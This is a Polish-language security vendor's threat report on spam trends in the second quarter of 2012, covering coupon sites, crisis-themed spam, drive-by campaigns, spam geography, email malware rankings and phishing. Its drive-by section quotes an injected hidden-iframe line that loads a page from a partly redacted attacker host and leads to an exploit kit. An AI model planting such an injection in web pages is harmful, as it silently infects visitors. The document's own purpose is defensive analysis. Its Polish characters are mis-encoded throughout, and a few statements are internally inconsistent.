Spam w II kwartale 2012 r.
Daria Gudkowa
Ekspert z Kaspersky Lab
Maria Namiestnikowa
Ekspert z Kaspersky Lab
- Kwarta艂 w liczbach
- Kupony a spam: spadek udzia艂u spamu
- Spam a sytuacja gospodarcza
- Gor膮ce tematy spamowe
- Geografia spamu
- E-maile ze szkodliwymi za艂膮cznikami
- Phishing
- Podsumowanie
Kwarta艂 w liczbach
- W II kwartale 2012 r. udzia艂 spamu w ruchu pocztowym zmniejszy艂 si臋 o 2,3 punktu procentowego w por贸wnaniu z poprzednim kwarta艂em i wynosi艂 艣rednio 74,3%.
- Najwi臋kszym 藕r贸d艂em spamu pozostaje Azja (53%) i Ameryka 艁aci艅ska (14%).
- Odsetek wiadomo艣ci e-mail ze szkodliwymi za艂膮cznikami zmniejszy艂 si臋 o 0,3 punktu procentowego w por贸wnaniu z I kwarta艂em 2012 r. i wynosi艂 艣rednio 3%.
Kupony a spam: spadek udzia艂u spamu
W II kwartale 2012 r. odsetek spamu w ruchu pocztowym nadal spada艂 i ostatecznie wynosi艂 艣rednio 74,3% - o 2,3 proc. mniej ni偶 w poprzednim kwartale.

Udzia艂 spamu w ruchu pocztowym w II kwartale 2012 r.
Spadek udzia艂u spamu w ruchu pocztowym jest w pewnym stopniu zjawiskiem sezonowym: wiele komputer贸w stanowi膮cych boty spamowe jest wy艂膮czonych w czasie, gdy ich w艂a艣ciciele przebywaj膮 na wakacjach. Z drugiej strony, r贸wnie dobrze mo偶emy mie膰 do czynienia z og贸ln膮 tendencj膮 spadkow膮 w ilo艣ci spamu, poniewa偶 w tzw. "spokojnym" okresie spada r贸wnie偶 poziom "czystego" ruchu e-mail. Tak wi臋c obserwowany spadek w ruchu spamowym nie jest spowodowany jedynie wahaniami sezonowymi.
Kilka lat temu w internecie pojawi艂y si臋 nowe projekty online oferuj膮ce u偶ytkownikom zbiorowe zni偶ki, czyli tzw. kupony. Kupon upowa偶nia u偶ytkownika do zni偶ki podczas zakupu towar贸w lub us艂ug. Serwisy kuponowe szybko zyska艂y popularno艣膰 na ca艂ym 艣wiecie: wiele firm wykorzystuje je w celu rozszerzenia swojej bazy klient贸w, z kolei klienci poluj膮 na nich na najlepsze oferty.
Spamerzy nie mogli zignorowa膰 wp艂ywu serwis贸w kuponowych na ruch e-mail oraz reklam臋 internetow膮.
Zachodni spam jest wykorzystywany przez uczestnik贸w program贸w partnerskich, z kt贸rych lwia cz臋艣膰 oferuje nielegalne towary lub us艂ugi. Jednak ruch pocztowy zawiera r贸wnie偶 wysy艂ki rozprzestrzeniane za po艣rednictwem program贸w partnerskich, kt贸re reklamuj膮 legalne towary (pami膮tki, kwiaty itd.), jak r贸wnie偶 wiadomo艣ci spamowe, kt贸re nie maj膮 nic wsp贸lnego z programami partnerskimi.
Serwisy kuponowe odegra艂y podw贸jn膮 rol臋 w zachodnim spamie - po pierwsze, spamerzy wykorzystali wysy艂ki "oferuj膮ce kupony" w celu przyci膮gni臋cia uwagi potencjalnych ofiar. Jednocze艣nie, system kuponowy zaw艂aszczy艂 cz臋艣膰 legalnej reklamy zawartej wcze艣niej w spamie. Nie powinno to nikogo dziwi膰 - serwisy kuponowe s膮 legalne, a ten rodzaj reklamy jest skuteczniejszy. Takie e-maile nie s膮 blokowane przez filtry spamowe i trafiaj膮 do odbiorc贸w zainteresowanych promocjami na serwisach kuponowych. W efekcie ilo艣膰 wysy艂ek spamowych w zachodnim ruchu pocztowym zmniejszy艂a si臋.
W pa艅stwach, w kt贸rych serwisy kuponowe s膮 popularne, a odsetek spamu jest wi臋kszy ni偶 odsetek promocji oferowanych za po艣rednictwem program贸w partnerskich, kupony mia艂y jeszcze wi臋kszy wp艂yw na spam. Wiele firm, kt贸re wcze艣niej wykorzystywa艂y spam jako g艂贸wne narz臋dzie reklamowe, albo ca艂kowicie skupi艂o si臋 na serwisach kuponowych, albo przymierza si臋 do tego. Mo偶na przyj膮膰, 偶e w Rosji biura podr贸偶y niemal ca艂kowicie zaprzestaj膮 zlecania kampanii spamowych i wykorzystuj膮 teraz serwisy kuponowe. W II kwartale 2012 r. udzia艂 spamu z kategorii "Podr贸偶e i turystyka" w segmencie RuNet stanowi艂, mimo sezonu wakacyjnego, zaledwie ponad 1%. Jednocze艣nie, oko艂o 10% wszystkich ofert rosyjskich serwis贸w kuponowych to oferty firm turystycznych oraz agencji podr贸偶y.
Im cz臋艣ciej pojawiaj膮 si臋 tego rodzaju projekty, tym wi臋ksze prawdopodobie艅stwo, 偶e reklamodawcy przerzuc膮 si臋 na programy kuponowe - zaci臋ta konkurencja sk艂ania serwisy kuponowe do oferowania korzystniejszych warunk贸w dla firm. Z drugiej strony, serwisy te mog膮 w ko艅cu zosta膰 zmuszone do wykorzystywania spamu w celu promowania swoich projekt贸w i poszerzenia grona ich odbiorc贸w.
Zmniejszenie si臋 udzia艂u spamu w ca艂kowitym ruchu pocztowym mo偶e mie膰 r贸wnie偶 zwi膮zek z trudn膮 sytuacj膮 gospodarcz膮 na 艣wiecie.
Spam a sytuacja gospodarcza
Zmiany w kategoriach spamu
Niezwykle niski poziom wysy艂ek e-mail z kategorii "Podr贸偶e i turystyka" w rosyjskoj臋zycznym spamie wynika nie tylko z pozytywnego trendu polegaj膮cego na tym, 偶e reklamodawcy przechodz膮 na wykorzystywanie legalnej platformy reklamowej. Jest to r贸wnie偶 jeden z niepokoj膮cych symptom贸w globalnej sytuacji gospodarczej. Problem le偶y w tym, 偶e wiele ma艂ych i 艣rednich rosyjskich biur podr贸偶y ju偶 zacz臋艂o "ton膮膰" w nowej fali kryzysu gospodarczego - co nieuchronnie doprowadzi艂o do spadku dzia艂alno艣ci reklamowej, 艂膮cznie ze spamem.
Wp艂yw na spam maj膮 r贸wnie偶 inne oznaki kryzysu. W maju, na przyk艂ad, zacz臋艂a wzrasta膰 ilo艣膰 angielskoj臋zycznego spamu promuj膮cego us艂ugi z kategorii finans贸w osobistych. W tym czasie odsetek tego rodzaju niechcianych wiadomo艣ci stanowi艂 23,5% og贸艂u spamu - miesi膮c p贸藕niej wzr贸s艂 trzykrotnie i wynosi艂 73%. W czerwcu wi臋kszo艣膰 takich wiadomo艣ci zawiera艂a oferty nielegalnych dochod贸w. To samo mo偶na powiedzie膰 o niemieckoj臋zycznym spamie - przez ostatnie kilka miesi臋cy liczba podejrzanych ofert pracy ros艂a. Podobne zmiany mo偶na by艂o zaobserwowa膰 w czasie kryzysu gospodarczego w latach 2008-2009.
Kryzys gospodarczy w Europie spowodowa艂 wzrost poziomu spamu z kategorii nieruchomo艣ci na rosyjskoj臋zycznym rynku. W lutym 2012 r. odsetek takich niechcianych wiadomo艣ci zwi臋kszy艂 si臋 z 5,5% do 9,2%. Miesi膮c p贸藕niej spam ten stanowi艂 ponad 15% wszystkich niechcianych wiadomo艣ci w rosyjskim segmencie internetu (RuNet), a w kwietniu wynosi艂 prawie 20%.
Ostatni nieoczekiwany wzrost liczby wiadomo艣ci spamowych z kategorii "Nieruchomo艣ci" zosta艂 zarejestrowany w RuNecie w latach 2008-2009 w okresie globalnego kryzysu finansowego. W tym czasie otoczenie rynkowe by艂o nieco inne i udzia艂 tej kategorii spamu zwi臋kszy艂 si臋 z 2-3% do 7-8%.
Wzrost udzia艂u kategorii "Nieruchomo艣ci" na tle spadku og贸lnego poziomu spamu wskazuje na znaczny wzrost ilo艣ci reklam nieruchomo艣ci w rosyjskim spamie. Wiele z takich ofert dotyczy nieruchomo艣ci w takich pa艅stwach jak Hiszpania, kt贸re same zmagaj膮 si臋 z powa偶nymi problemami gospodarczymi. Wynika to z tego, 偶e drobni inwestorzy zwykle sprzedaj膮 nieruchomo艣ci, kiedy przewidywany jest spadek cen. Rosyjskoj臋zyczny spam pozostaje najta艅szym sposobem reklamowania takich ofert sprzeda偶y.
W II kwartale 2012 r. oszu艣ci zacz臋li wykorzystywa膰 kryzys zar贸wno w celu zwr贸cenia uwagi na tradycyjne wysy艂ki dystrybuowane za po艣rednictwem program贸w partnerskich, jak i reklamowania podejrzanie tanich po偶yczek. Ponadto, angielsko i rosyjskoj臋zyczne wiadomo艣ci e-mail zaprasza艂y do udzia艂u w seminariach na temat globalnego kryzysu gospodarczego, w szczeg贸lno艣ci w strefie Euro.


Szkodliwy spam
Je偶eli trudna sytuacja gospodarcza doprowadzi do powt贸rki scenariusza z lat 2008-2009, w nadchodz膮cych miesi膮cach powinni艣my spodziewa膰 si臋 wzrostu poziomu oszuka艅czego i szkodliwego spamu. W 艣wietle tej prognozy warto om贸wi膰 kilka sztuczek spamerskich wykorzystywanych do dystrybucji szkodliwego kodu. Metody te obejmuj膮 zar贸wno nowe techniki jak i kilka starych, ulubionych trik贸w spamer贸w.
Spam Drive-by
Powszechnie wiadomo, 偶e szkodliwy spam wyst臋puje nie tylko w postaci za艂膮cznik贸w, ale r贸wnie偶 niebezpiecznych odsy艂aczy. Warto wiedzie膰, 偶e klikni臋cie jednego z takich odsy艂aczy mo偶e doprowadzi膰 do zainfekowania komputera - z czego jego w艂a艣ciciel mo偶e w og贸le nie zdawa膰 sobie sprawy. Wynika to z tego, 偶e odsy艂acze te przekierowuj膮 do r贸偶nych stron zawieraj膮cych pakiety exploit贸w, czyli zestawy procedur, kt贸rych celem jest znalezienie luk w popularnych aplikacjach i systemach operacyjnych.
W II kwartale 2012 r. odsetek wysy艂ek wykorzystywanych do przeprowadzania atak贸w drive-by by艂 szczeg贸lnie wysoki. Poni偶ej przedstawiamy konkretne przyk艂ady ilustruj膮ce og贸lne dzia艂anie takich atak贸w.
- U偶ytkownik otrzymuje fa艂szywe powiadomienie z popularnego zasobu, e-mail wygl膮daj膮cy na oficjaln膮 wiadomo艣膰, mailing informacyjny, a nawet wiadomo艣膰 od znajomej osoby. Wszystkie te wiadomo艣ci 艂膮czy to, 偶e zach臋caj膮 u偶ytkownika do klikni臋cia odsy艂acza. Bardzo cz臋sto zawieraj膮 tekst namawiaj膮cy u偶ytkownika do klikni臋cia odsy艂acza "jak najszybciej" lub "niezw艂ocznie".
- Po klikni臋ciu odsy艂acza u偶ytkownik l膮duje na stronie ze zintegrowanym zaciemnionym skryptem (w wiadomo艣ci powy偶ej skrypt ten zosta艂 wykryty przez Kaspersky Anti-Virus jako Trojan.Script.Generic). Zadaniem skryptu jest przekierowywanie u偶ytkownika na szkodliw膮 stron臋 przy pomocy znacznika iframe.
- W tym konkretnym przypadku u偶ytkownik jest przekierowywany na stron臋 z pakietem exploit贸w Phoenix. Innym razem odsy艂acze mog膮 prowadzi膰 do pakietu exploit贸w Blackhole. Po przekierowaniu komputer u偶ytkownika jest atakowany przez exploity wykorzystuj膮ce luki w takim oprogramowaniu jak Java, Flash Player lub Adobe Reader. Je偶eli oszu艣ci b臋d膮 mieli szcz臋艣cie (tj. przynajmniej jedna z wymienionych wy偶ej aplikacji zainstalowanych na komputerze u偶ytkownika b臋dzie podatna na ataki), na komputer ofiary zostanie pobrany plik wykonywalny. Plik ten kontaktuje si臋 z centrum kontroli i pobiera inne szkodliwe programy na komputer.


Oto cz臋艣膰 pocz膮tkowego kodu:
document.write (s) <iframesrc='http://r*****d.su:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
Na stronie wy艣wietla si臋 komunikat "Loading...Please Wait..."
Szkodliwe oprogramowanie Wiki
W kwietniu wykryli艣my spam, kt贸ry imitowa艂 oficjalne powiadomienie z Facebooka. Tym razem jednak, zawarte w wiadomo艣ciach e-mail odsy艂acze nie przenosi艂y u偶ytkownik贸w na zhakowane domeny lub strony, ale na strony Wikipedii oraz Amazona. Najwyra藕niej, szkodliwi u偶ytkownicy zaszyli szkodliwy skrypt w utworzonych przez siebie stronach Wikipedii, jak r贸wnie偶 w stronach, kt贸re mia艂y przypomina膰 reklamy u偶ywanych przedmiot贸w wystawionych na portalu Amazon.com. Dlaczego "najwyra藕niej"? Poniewa偶 taktyka ta okaza艂a si臋 niezbyt efektywna. Obs艂uga obu stron zareagowa艂a szybko i zanim rozprzestrzeniono odsy艂acze, zainfekowane strony zosta艂y wy艂膮czone.


Szkodliwi podr贸偶nicy
Dystrybutorzy szkodliwych wiadomo艣ci e-mail nieustannie udoskonalaj膮 metody socjotechniki wykorzystywane w celu prowadzenia swojej oszuka艅czej aktywno艣ci. Na przyk艂ad, w II kwartale rozprzestrzeniali masowe wysy艂ki oferuj膮ce pe艂ny szkodliwy "pakiet turystyczny" po艣wi臋cony podr贸偶om i turystyce - akurat przed rozpocz臋ciem si臋 sezonu wakacyjnego.
Najpierw pojawi艂y si臋 fa艂szywe powiadomienia od linii lotniczych. W pierwszym kwartale 2012 r. u偶ytkownik贸w zach臋cano do dokonania odprawy online przed lotem liniami US Airways, natomiast w drugim kwartale w podobnym triku wykorzystano British Airways.


Opr贸cz lot贸w spamerzy wykorzystywali r贸wnie偶 rezerwacje hotelowe. Zarejestrowali艣my masow膮 wysy艂k臋 rzekomo wys艂an膮 w imieniu booking.com. Wiadomo艣ci prosi艂y u偶ytkownik贸w o potwierdzenie rezerwacji hotelowej i zawiera艂y szkodliwy za艂膮cznik wykrywany przez Kaspersky Anti-Virus jako Trojan-Spy.Win32.Zbot.


Wiadomo艣膰 nie wygl膮da na autentyczn膮 i z wyj膮tkiem fa艂szywego pola FROM nie ma nic wsp贸lnego z oryginalnym e-mailem od booking.com. Jednak portale rezerwacyjne ciesz膮 si臋 du偶膮 popularno艣ci膮 latem i nie wszyscy klienci zwracaj膮 uwag臋 na szczeg贸艂y. Dlatego nawet s艂aba imitacja strony mo偶e zwabi膰 wiele ofiar.
Warto pami臋ta膰, 偶e powa偶ne firmy nie wysy艂aj膮 potwierdze艅 w formie archiwum ZIP. Ponadto, w razie w膮tpliwo艣ci co do autentyczno艣ci wiadomo艣ci e-mail zawsze mo偶na skontaktowa膰 si臋 z firm膮 za pomoc膮 danych kontaktowych podanych na jej oficjalnej stronie.
Gor膮ce tematy spamowe
Spam prezydencki
Nie b臋dzie przesad膮 stwierdzenie, 偶e w II kwartale 2012 r. Barack Obama by艂 osob膮 ciesz膮c膮 si臋 najwi臋ksz膮 popularno艣ci膮 w艣r贸d spamer贸w. Wykryli艣my mn贸stwo wiadomo艣ci, w kt贸rych wymienione by艂o jego nazwisko. Wi臋kszo艣膰 z nich to e-maile krytykuj膮ce nowe ustawy zatwierdzone przez prezydenta. Wiadomo艣ci te by艂y dobrze zaprojektowane i wzywa艂y odbiorc贸w do przy艂膮czenia si臋 do protestu przeciwko dzia艂aniom Obamy. Zawiera艂y r贸wnie偶 pro艣b臋 o przelanie pieni臋dzy na konta kilku oficjalnych organizacji ameryka艅skich.


Co ciekawe, w Stanach Zjednoczonych spam polityczny i niekomercyjny nie podlega pod ustaw臋 CAN-SPAM Act, co oznacza, 偶e oficjalne organizacje rzeczywi艣cie mog艂y wys艂a膰 takie wiadomo艣ci.
Pojawi艂y si臋 r贸wnie偶 wysy艂ki wykorzystuj膮ce nazwisko Obamy, kt贸re narusza艂y ameryka艅skie prawo antyspamowe. Podczas analizy wiadomo艣ci z tematem "Obama is caught on a hottie" reklamuj膮cych nielegalne farmaceutyki lub podrabiane towary znanych projektant贸w przypomnia艂y nam si臋 bardzo podobne e-maile sprzed prawie czterech lat. W tym czasie, nied艂ugo po wyborze Obamy na prezydenta, jego nazwisko pojawia艂o si臋 w niemal ka偶dej wysy艂ce spamowej z takimi tematami jak: "Obama has revealed his secrets" [Obama zdradzi艂 swoje sekrety] czy "Obama is a woman! [Obama jest kobiet膮]"! Wygl膮da na to, 偶e spamerzy wr贸cili do swoich starych sztuczek, 偶eruj膮c na powszechnym zainteresowaniu wyborami prezydenckimi w Stanach Zjednoczonych tej jesieni.
R贸wnie偶 wy艣cig o fotel prezydenta we Francji mia艂 wp艂yw na tematy spamu w II kwartale. Ruch e-mail zawiera艂 masowe wysy艂ki dotycz膮ce kandydat贸w, jednak nie by艂y one zbyt liczne. Tak jak wspominali艣my w naszym kwietniowym raporcie spamowym, francuskie wiadomo艣ci spamowe oferowa艂y w szczeg贸lno艣ci t-shirty z has艂ami popieraj膮cymi Sarkozy'ego. Nie by艂o jednak 偶adnej kampanii na rzecz Francoisa Hollande'a, nowo wybranego prezydenta Francji.
Oszustwo tematyczne
Sytuacja w Syrii stanowi艂a temat wiadomo艣ci wysy艂anych przez "nigeryjskich" spamer贸w od kwietnia. Na naszym blogu pisali艣my ju偶 o e-mailach pochodz膮cych rzekomo od "偶ony Assada". Podobne wiadomo艣ci pojawia艂y si臋 przez ca艂y kwarta艂. Jednak tw贸rczy spamerzy nie ograniczyli si臋 do jednego schematu i wysy艂ali r贸wnie偶 e-maile od "cz艂onk贸w rodziny Assada" oraz zwyk艂ych Syryjczyk贸w.


Jednym z najwa偶niejszych wydarze艅 II kwarta艂u by艂y czerwcowe Mistrzostwa w Pi艂ce No偶nej Euro 2012. Nast臋pnie w centrum uwagi spamer贸w znalaz艂y si臋 Igrzyska Olimpijskie w Londynie: spamerzy powiadamiali o wygranych na loterii zorganizowanej rzekomo przez Fundacj臋 Olimpijsk膮. Im bli偶ej Igrzysk Olimpijskich, tym wi臋ksz膮 aktywno艣膰 wykazywali spamerzy.
Geografia spamu
殴r贸d艂a spamu wed艂ug pa艅stwa
W II kwartale 2012 r. rozk艂ad geograficzny spamu wed艂ug pa艅stwa zmieni艂 si臋 znacz膮co. Prowadzenie nieoczekiwanie obj臋艂y Chiny - z terytorium tego pochodzi艂o 19% ca艂ego spamu. Po d艂ugiej przerwie w tr贸jce najwi臋kszych spamer贸w ponownie znalaz艂y si臋 Stany Zjednoczone, kt贸re uplasowa艂y si臋 na drugim miejscu wraz z Indiami, dystrybuuj膮c t臋 sam膮 ilo艣膰 spamu (11,7%).


殴r贸d艂a spamu wed艂ug kraju w II kwartale 2012 r.
W poprzednim kwartale pisali艣my o relokacji botnet贸w i mo偶liwych zmianach w rozk艂adzie geograficznym spamu. Nie spodziewali艣my si臋 jednak tak drastycznych przesuni臋膰. Kilka lat temu Chiny znajdowa艂y si臋 w艣r贸d lider贸w pod wzgl臋dem dystrybucji niechcianych wiadomo艣ci, jednak po przyj臋ciu prawa antyspamowego w 2006 roku ilo艣膰 wiadomo艣ci 艣mieci rozprzestrzenianych z tego terytorium znacznie zmniejszy艂a si臋. By膰 mo偶e sze艣膰 lat p贸藕niej spamerzy zapomnieli o tym prawie, zw艂aszcza 偶e nie jest ono aktywnie egzekwowane.
Og贸lnie jednak, powr贸t Chin i Stan贸w Zjednoczonych do czo艂贸wki rankingu nie powinien zaskakiwa膰: dobry dost臋p do internetu i ogromna liczba komputer贸w, kt贸re mog膮 zosta膰 zainfekowane botami i u偶yte do dystrybucji spamu przyci膮gaj膮 spamer贸w.
Mimo relokacji 藕r贸de艂 spamu g艂贸wne trendy nie zmieni艂y si臋: wi臋cej spamu pochodzi z Azji i Ameryki 艁aci艅skiej. W II kwartale 2012 r. na li艣cie Top 20 najwi臋kszych 藕r贸de艂 spamu znalaz艂o si臋 dziewi臋膰 pa艅stw azjatyckich, pi臋膰 pa艅stw z Ameryki 艁aci艅skiej i tylko po jednym z Europy Zachodniej (Wielka Brytania) i Europy Wschodniej (Rosja).
Wyra藕nie wida膰, 偶e spam nap艂ywa do r贸偶nych region贸w z r贸偶nych pa艅stw. Na przyk艂ad, pa艅stwa Europy Wschodniej odnotowuj膮 wi臋cej spamu z Chin (Chiny wysy艂aj膮 znacznie mniej spamu do innych region贸w, a na wysok膮 pozycj臋 tego pa艅stwa w 艣wiatowym rankingu spamer贸w ma wp艂yw spam atakuj膮cy Europ臋), podczas gdy pa艅stwa Europy Wschodniej s膮 "atakowane" przez spam indyjski, a spam przychodz膮cy do Ameryki P贸艂nocnej w wi臋kszo艣ci pochodzi ze Stan贸w Zjednoczonych.
殴r贸d艂a spamu wed艂ug regionu


殴r贸d艂a spamu wed艂ug regionu w II kwartale 2012 r.
Jak pokazuje diagram, wi臋kszo艣膰 globalnego spamu pochodzi z Azji. Region ten stanowi wieloletniego lidera w dystrybucji spamu, a w II kwartale jego udzia艂 wzr贸s艂 jeszcze bardziej. W du偶ej mierze spowodowane to by艂o wzrostem aktywno艣ci w Chinach, w rezultacie czego pa艅stwo to stanowi艂o najwi臋ksze 藕r贸d艂o globalnego spamu.
Wzros艂a r贸wnie偶 ilo艣膰 spamu rozprzestrzenianego z Ameryki P贸艂nocnej. Wi臋kszo艣膰 zosta艂a wys艂ana ze Stan贸w Zjednoczonych, innego by艂ego lidera rankingu. Dwa lata temu zamkni臋to kilka centr贸w du偶ych botnet贸w, co spowodowa艂o spadek ilo艣ci spamu pochodz膮cego z tego pa艅stwa. Teraz spamerzy zn贸w zacz臋li tworzy膰 botnety w Stanach Zjednoczonych. Nie ma w tym nic dziwnego, bior膮c pod uwag臋 ogromn膮 liczb臋 u偶ytkownik贸w internetu, kt贸rych komputery mog膮 zosta膰 zainfekowane.

Dynamika dystrybucji spamu wed艂ug regionu w II kwartale 2012 r.
Je偶eli chodzi o inne regiony, ilo艣膰 spamu wychodz膮cego z Europy Zachodniej i Wschodniej nadal zmniejsza艂a si臋.
E-maile ze szkodliwymi za艂膮cznikami
W II kwartale 2012 r. 艣redni odsetek wiadomo艣ci e-mail ze szkodliwymi za艂膮cznikami zmniejszy艂 si臋 o 0,3 punktu procentowego i wynosi艂 3%. Wykres poni偶ej pokazuje rozk艂ad szkodliwego spamu w poszczeg贸lnych miesi膮cach.

Odsetek spamu ze szkodliwymi za艂膮cznikami w II kwartale 2012 r.
Jak wida膰 na wykresie, zmiany w odsetku szkodliwego spamu w II kwartale by艂y nieznaczne.
Warto przypomnie膰, 偶e w celu rozprzestrzeniania szkodliwego oprogramowania spamerzy wykorzystuj膮 zar贸wno szkodliwe za艂膮czniki, jak i szkodliwe odsy艂acze. Dlatego te偶 spadek liczby szkodliwych za艂膮cznik贸w w ruchu pocztowym nie zawsze wskazuje na spadek udzia艂u szkodliwych wysy艂ek.
Poziom wykrywania szkodliwego oprogramowania w poczcie e-mail dla r贸偶nych pa艅stw
Wsp贸艂czynniki wykrywania szkodliwego oprogramowania w poczcie e-mail dla r贸偶nych pa艅stw w II kwartale 2012 r. kszta艂towa艂y si臋 nast臋puj膮co:


Wsp贸艂czynniki wykrywania szkodliwego oprogramowania w poczcie e-mail w II kwartale 2012 r.
Og贸lnie, ranking ze wzgl臋du na ilo艣膰 wykrytego szkodliwego oprogramowania w poczcie e-mail dla r贸偶nych pa艅stw prawie nie zmieni艂 si臋 w por贸wnaniu z poprzednim kwarta艂em: w rankingu utrzyma艂o si臋 dziewi臋膰 pa艅stw z pierwszej 10, zamieniaj膮c si臋 jedynie miejscami. R贸wnie偶 niewielkie zmiany odnotowano w odsetkach szkodliwych program贸w wykrytych w poczcie e-mail na terytoriach pa艅stw z pierwszej 10 - odsetki te waha艂y si臋 w granicach 2 punkt贸w procentowych w przypadku wszystkich pa艅stw z wyj膮tkiem specjalnego regionu administracyjnego Hong Kongu.
Hong Kong, kt贸ry w pierwszym kwartale znalaz艂 si臋 na 2 miejscu, w II kwartale wypad艂 z pierwszej pi膮tki (w pa艅stwie tym odsetek szkodliwego oprogramowania w poczcie e-mail wynosi艂 4,8%, o 4 punkty procentowe mniej ni偶 w poprzednim kwartale).
Ju偶 sz贸sty miesi膮c z rz臋du Stany Zjednoczone znalaz艂y si臋 na szczycie rankingu wykrywania szkodliwego oprogramowania w poczcie e-mail. W II kwartale odsetek wykrytych szkodliwych program贸w w wiadomo艣ciach e-mail w tym pa艅stwie wzr贸s艂 o 2 punkty procentowe w por贸wnaniu z poprzednim kwarta艂em. Wielka Brytania i Niemcy znalaz艂y si臋 na 2 i 3 miejscu, odnotowuj膮c odpowiednio wzrost o 2 i 1,4 punkty procentowe.
Top 10 szkodliwych program贸w rozprzestrzenianych za po艣rednictwem ruchu pocztowego
Trojan-Spy.HTML.Fraud.gen pozosta艂 najszerzej rozprzestrzenianym szkodliwym programem w I kwartale 2012 r., odpowiadaj膮c za 12,5% wszystkich wykrytych szkodliwych program贸w, o 2 punkty procentowe mniej ni偶 w poprzednim kwartale. Trojan ten wykorzystuje technologi臋 spoofingu i imituje stron臋 HTML. Wyst臋puje w wiadomo艣ci phishingowej zawieraj膮cej odsy艂acz do fa艂szywej strony przypominaj膮cej stron臋 znanego banku lub systemu e-p艂atno艣ci, na kt贸rej u偶ytkownik jest proszony o podanie loginu i has艂a. Dane podawane na takiej stronie s膮 wysy艂ane cyberprzest臋pcom.


Top 10 szkodliwych program贸w dystrybuowanych za po艣rednictwem ruchu pocztowego w II kwartale 2012 r.
Robaki pocztowe nadal znajduj膮 si臋 w艣r贸d najstarszych weteran贸w rankingu Top10. Na drugim miejscu po raz kolejny uplasowa艂 si臋 Email-Worm.Win32.Mydoom.m. Robak ten, jak r贸wnie偶 podobny do niego Mydoom.l (na 9 miejscu), posiada tylko dwie funkcje - zbieranie adres贸w e-mail oraz wysy艂anie na nie swoich kopii. Email-Worm.Win32.NetSky (na 5 miejscu) posiada t臋 sam膮 funkcjonalno艣膰. Email-Worm.Win32.Bagle.gt, kolejny robak pocztowy (na 3 miejscu w rankingu), pobiera opr贸cz tego szkodliwe programy z internetu.
Packed.Win32.Katusha.o, kt贸ry w czerwcowym rankingu uplasowa艂 si臋 na drugim miejscu, w II kwartale znalaz艂 si臋 na 6 pozycji. Pakery z tej rodziny regularnie pojawiaj膮 si臋 w tym rankingu Top10. Programy te s膮 wykorzystywane do pakowania innych szkodnik贸w (w wi臋kszo艣ci fa艂szywych program贸w antywirusowych) w celu obej艣cia wykrywania antywirusowego.
Phishing
W drugim kwartale 2012 r. liczba atak贸w na u偶ytkownik贸w portali spo艂eczno艣ciowych stanowi艂a ponad jedn膮 czwart膮 wszystkich atak贸w phishingowych.


Top 100 organizacji, wed艂ug sfery aktywno艣ci, atakowanych przez phisher贸w w II kwartale 2012 r. (na podstawie statystyk wykrywania dostarczonych przez komponent antyphishingowy)
Ranking ten opiera si臋 na statystykach wykrywania dostarczonych przez komponent antyphishingowy oprogramowania Kaspersky Lab aktywowany za ka偶dym razem, gdy u偶ytkownik pr贸buje klikn膮膰 odsy艂acz phishingowy, niezale偶nie od tego czy odsy艂acz ten znajduje si臋 w wiadomo艣ci spamowej czy na stronie internetowej.
W II kwartale 2012 r. kategoria "portale spo艂eczno艣ciowe" wyprzedzi艂a "organizacje finansowe", "e-p艂atno艣ci" oraz "banki" w rankingu najatrakcyjniejszych cel贸w phishingowych. Mia艂o to zwi膮zek z pocz膮tkiem letnich wakacji dla szk贸艂 i uczelni wy偶szych, gdy wielu student贸w i uczni贸w sp臋dza wi臋cej czasu w internecie. Tacy u偶ytkownicy prawdopodobnie nie posiadaj膮 kont bankowych online. W okresie tym zmniejsza si臋 r贸wnie偶 aktywno艣膰 biznesowa, co prowadzi do spadku w intensywno艣ci atak贸w na organizacje finansowe. Z drugiej strony, pozostaj膮 one najbardziej dochodowymi celami dla cyberprzest臋pc贸w. To dlatego ich udzia艂, mimo spadku, utrzyma艂 si臋 na bardzo wysokim poziomie.
Podsumowanie
Ilo艣膰 spamu zmniejsza si臋. Jest to spowodowane kilkoma czynnikami: sezonowymi (wiele komputer贸w-bot贸w spamowych jest wy艂膮czonych w czasie, gdy ich w艂a艣ciciele przebywaj膮 na wakacjach), ekonomicznymi (na spam wp艂ywaj膮 zagro偶enia zwi膮zane z kryzysem gospodarczym) oraz konkurencyjnymi (niekt贸rzy reklamodawcy rezygnuj膮 z us艂ug spamer贸w i staj膮 si臋 klientami serwis贸w kuponowych). Przewidujemy dalsze spadek udzia艂u spamu nawet po zako艅czeniu sezonu wakacyjnego wraz z pogarszaniem si臋 sytuacji gospodarczej. Spodziewamy si臋 r贸wnie偶 stopniowego zmniejszania si臋 odsetka spamu, kt贸ry w nast臋pnym roku mo偶e spa艣膰 do poziomu 65% ca艂kowitego ruchu pocztowego.
Zmieni艂a si臋 r贸wnie偶 geografia 藕r贸de艂 spamu. Szkodliwi u偶ytkownicy s膮 zainteresowani pa艅stwami, w kt贸rych istnieje dobre po艂膮czenie z internetem oraz du偶a liczba u偶ytkownik贸w, dlatego przenie艣li swoje botnety do Chin i Stan贸w Zjednoczonych - pa艅stw, kt贸re obecnie rozprzestrzeniaj膮 najwi臋ksz膮 ilo艣膰 spamu. Chocia偶 przewidywali艣my zmiany w rozk艂adzie 藕r贸de艂 spamu, nie spodziewali艣my si臋 ich tak szybko. Z drugiej strony, utrzyma艂a si臋 tendencja wzrostu odsetka spamu rozprzestrzenianego z Azji i Ameryki 艁aci艅skiej.
Nie bez powodu po艣wi臋camy tak du偶o czasu na opis sztuczek wykorzystywanych przez spamer贸w w celu rozprzestrzeniania szkodliwego kodu. Nasze do艣wiadczenie w monitorowaniu spamu w czasie kryzysu w latach 2008-2009 pokazuje, 偶e zauwa偶alny wzrost udzia艂u szkodliwego oprogramowania w ruchu pocztowym jest niemal gwarantowany. To oznacza, 偶e spam b臋dzie o wiele bardziej niebezpieczny. W ostatnich latach cyberprzest臋pcy znacznie rozszerzyli sw贸j arsena艂, kt贸ry jest aktualizowany o nowe metody socjotechniki niemal ka偶dego miesi膮ca.
殴ród艂o:![]() |